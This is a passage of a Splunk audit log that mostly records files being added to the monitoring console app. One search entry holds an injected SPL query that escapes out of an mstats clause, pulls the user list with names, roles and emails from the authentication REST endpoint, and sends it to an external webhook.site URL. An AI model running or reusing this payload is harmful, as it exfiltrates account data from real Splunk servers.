Audit:[timestamp=10-06-2022 17:42:00.988, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/InfoDialog.js", isdir=0, size=1850, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.982, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Filters.pcss", isdir=0, size=219, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.977, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Filters.js", isdir=0, size=4873, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.972, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Filters.html", isdir=0, size=1394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Action.pcss", isdir=0, size=127, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.963, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Action.js", isdir=0, size=1832, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.959, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/splunk_health_check/Action.html", isdir=0, size=677, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.936, user=user, action=quota,search_id=1665078120.4, elapsed_ms=1, cache_size=0] Audit:[timestamp=10-06-2022 17:42:00.936, user=user, action=search, info=granted , search_id='1665078120.4', search='| mstats avg('fake') WHERE "index\"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b]" "demo"=qwe', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 17:00:00 2022', apiEndTime='Thu Oct 6 17:42:00 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 17:42:00.935, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:42:00.935, user=user, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 17:42:00.782, user=user, action=fsh_search, info=denied ] Audit:[timestamp=10-06-2022 17:42:00.782, user=user, action=fsh_manage, info=denied ] Audit:[timestamp=10-06-2022 17:42:00.782, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:42:00.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/components/ViewMenu_old.js", isdir=0, size=3426, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.545, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/components/ViewMenu.js", isdir=0, size=3234, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/components/Action_old.js", isdir=0, size=1627, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.534, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/components/Action.js", isdir=0, size=1442, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.530, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/components", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:00.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/Master.pcss", isdir=0, size=765, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.520, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/Master.js", isdir=0, size=13007, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/instances/Master.html", isdir=0, size=883, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.508, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/UserConfirmationDialog.js", isdir=0, size=2205, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.503, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/SimpleDialog.js", isdir=0, size=2536, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/ResetToFactoryModeConfirmationDialog.js", isdir=0, size=7027, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.495, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/MultiInputControl.js", isdir=0, size=2473, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/FailureDialog.js", isdir=0, size=1004, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.486, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/ErrorDialog.js", isdir=0, size=1673, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditServerRolesDialog.js", isdir=0, size=3947, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditMenu.js", isdir=0, size=6173, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditInstanceDialog.js", isdir=0, size=8446, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.465, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditGroupsDialog.js", isdir=0, size=4520, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.461, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditAllSuccessFailureDialog.js", isdir=0, size=730, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.457, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditAllServerRolesDialog.js", isdir=0, size=5200, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.452, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditAllMenu.js", isdir=0, size=6007, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditAllGroupsDialog.js", isdir=0, size=5434, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/EditAllDisableDialog.js", isdir=0, size=4336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.436, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/DistributedModeWarningDialog.js", isdir=0, size=2777, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.432, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/DisableConfirmationDialog.js", isdir=0, size=3609, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/ConfirmationDialog.js", isdir=0, size=755, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.423, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls/ConfigureAllConfirmationDialog.js", isdir=0, size=1853, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.217, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/controls", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:00.212, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/TableRow.js", isdir=0, size=12743, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.207, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/MoreInfo.js", isdir=0, size=5140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.202, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/table/Master.js", isdir=0, size=17429, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.198, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/standalone_mode/Master.js", isdir=0, size=16314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.193, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/standalone_mode/Master.html", isdir=0, size=5930, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.087, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SingleValueWithResults.js", isdir=0, size=1604, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.084, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SingleValueWithResults.html", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.080, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SingleValue.js", isdir=0, size=1983, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.077, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SingleValue.html", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.073, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SingleSearchResult.js", isdir=0, size=3085, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/SearchHeadPanel.js", isdir=0, size=2432, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.065, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ResourceUsageSection.js", isdir=0, size=6755, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.061, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ResourceUsageSection.html", isdir=0, size=173, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.058, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ProgressBar.js", isdir=0, size=2938, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.052, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ProgressBar.html", isdir=0, size=714, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.049, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/Panel.js", isdir=0, size=7541, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.044, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/Panel.html", isdir=0, size=1090, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.040, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/LicenseUsageSection.js", isdir=0, size=1645, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.036, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/LicenseUsageSection.html", isdir=0, size=130, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/LicenseSlaveWarningSection.js", isdir=0, size=1590, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.020, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/LicenseSlaveWarningSection.html", isdir=0, size=87, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.012, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/LicenseMasterPanel.js", isdir=0, size=2872, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.007, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/IndexingRateSection.js", isdir=0, size=2423, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:00.000, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/IndexingRateSection.html", isdir=0, size=194, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/IndexerPanel.js", isdir=0, size=2367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.990, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/DeploymentServerStatusSection.js", isdir=0, size=1904, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/DeploymentServerStatusSection.html", isdir=0, size=172, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.979, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/DeploymentServerPanel.js", isdir=0, size=2464, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.973, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ConcurrentSearchSection.js", isdir=0, size=2467, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.967, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ConcurrentSearchSection.html", isdir=0, size=190, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.962, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ClusterMasterStatusSection.js", isdir=0, size=2966, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.951, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ClusterMasterStatusSection.html", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components/ClusterMasterPanel.js", isdir=0, size=2426, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.741, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements/Sorter.js", isdir=0, size=2342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.737, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements/Pagination.js", isdir=0, size=10150, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements/Instance.js", isdir=0, size=11870, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.727, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements/GroupedInstance.js", isdir=0, size=3775, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.722, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements/Base.js", isdir=0, size=3612, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/elements", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist/Master.js", isdir=0, size=10193, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/controls/PerPageMenu.js", isdir=0, size=1754, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.604, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/controls/InstanceMenu.js", isdir=0, size=8037, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.593, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/instancelist", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/controls", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/StatusFilter.js", isdir=0, size=7328, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/StatusFilter.html", isdir=0, size=576, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/Master.js", isdir=0, size=13477, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/Master.html", isdir=0, size=1060, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology/InstanceLinks.js", isdir=0, size=15717, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/topology", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/components", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/Master.js", isdir=0, size=21651, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.440, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/Master.html", isdir=0, size=419, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode/Classic.js", isdir=0, size=9520, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.430, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/util_old.js", isdir=0, size=576, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.426, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/util.js", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/topology.pcss", isdir=0, size=4601, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.419, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/standalone_mode", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.414, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/loading_white.gif", isdir=0, size=4178, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.411, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/distributed_mode", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:59.407, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/classic-distributed.pcss", isdir=0, size=4802, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/Master.pcss", isdir=0, size=4044, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.398, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/Alerts_old.js", isdir=0, size=10429, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.393, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/Alerts.js", isdir=0, size=10577, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.389, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/overview/Alerts.html", isdir=0, size=1118, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.285, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/GradientColorRangeColorPicker.js", isdir=0, size=5636, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:59.281, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views/settings/overview_preferences/components/GradientColorRangeColorControl.js", isdir=0, size=824, gid=41812, 